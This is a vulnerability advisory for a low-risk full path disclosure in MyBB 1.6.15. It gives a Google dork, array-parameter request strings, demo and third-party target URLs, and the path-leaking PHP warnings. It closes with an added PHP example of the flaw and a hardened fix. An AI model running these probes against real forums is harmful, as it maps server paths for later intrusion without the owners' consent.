MyBB 1.6.15 - Full Path Disclosure

2014.08.09
Credit: DemoLisH
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: MyBB 1.6.15 - Full Path Disclosure
# Google Dork: intext:"Powered By MyBB"
# Date: 08.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.6.15 - Latest Version
# Contact: onur@b3yaz.org

***************************************************

[~#~] Exploit:

memberlist.php?sort[$victor]=getdaily
modcp.php?action=ipsearch&ipaddress[$victor]=getdaily
forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily

[~#~] Demo:

http://community.mybb.com/memberlist.php?sort[$victor]=getdaily
http://community.mybb.com/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily

[~#~] Error:

Warning [2] strtolower() expects parameter 1 to be string, array given - Line: 58 - File: memberlist.php PHP 5.4.28-1~dotdeb.1 (Linux)
Warning [2] mb_strtolower() expects parameter 1 to be string, array given - Line: 4566 - File: inc/functions.php PHP 5.4.28-1~dotdeb.1 (Linux)

[~#~] Example:

http://mybXb.co.il/forum/memberlist.php?sort[$victor]=getdaily
http://mybXb.co.il/forum/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily
http://www.mXybb.fr/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily
http://destek.myXbb.com.tr/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily
http://www.myXbb.biz/forumdisplay.php?selectall=&fid=2&sortby=lastpost&order[$victor]=getdaily

***************************************************

[~#~] Thanks To: ynR !, T3kfurD4GLi, X-X-X, PoseidonKairos, Mugair and all B3yaz.Org Members.
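The warnings quoted above appear because PHP parses a query parameter written as `sort[x]=...` into an array, and the script hands that array straight to strtolower(); the warning text then carries the script's filesystem path into the response. The following is an added example, not MyBB's code, showing the unchecked pattern next to a hardened version (the parameter name `sort` is taken from the advisory; the allowed sort keys and the simulated requests are constructed):

```php
<?php
// Added example (not MyBB's code): an array-valued query parameter reaching a
// string function, and how to keep that from leaking the script path.

// Vulnerable pattern: $get['sort'] is assumed to be a string. With a request
// like memberlist.php?sort[x]=getdaily it is an array, and on PHP 5/7
// strtolower() emits a warning naming the full path of the calling file
// (PHP 8 throws a TypeError instead, which also reveals the path if uncaught).
function sort_key_vulnerable(array $get)
{
    return strtolower($get['sort']);
}

// Hardened pattern: accept only scalar input, fall back to a safe default,
// and whitelist the permitted values so the type of the parameter never
// reaches a string function unchecked.
function sort_key_hardened(array $get)
{
    $allowed = array('username', 'regdate', 'lastvisit', 'postnum'); // constructed
    $raw = (isset($get['sort']) && is_scalar($get['sort'])) ? (string) $get['sort'] : '';
    $sort = strtolower($raw);
    return in_array($sort, $allowed, true) ? $sort : 'username';
}

// Defence in depth: whatever a script does with its input, warnings belong in
// the server log, not in the HTTP response (set in php.ini for production).
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Constructed requests, shaped as PHP fills $_GET from the query string.
$normal = array('sort' => 'RegDate');               // ?sort=RegDate
$probe  = array('sort' => array('x' => 'getdaily')); // ?sort[x]=getdaily

// The hardened function lowercases and accepts the scalar value and rejects
// the array probe, returning the default key without any warning.
echo sort_key_hardened($normal), "\n";
echo sort_key_hardened($probe), "\n";
```

Calling sort_key_vulnerable($probe) with display_errors enabled reproduces the path-disclosing warning quoted in the advisory; the hardened function never passes a non-string to strtolower().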

References:

http://www.mybb.com/downloads


Copyright 2024, cxsecurity.com
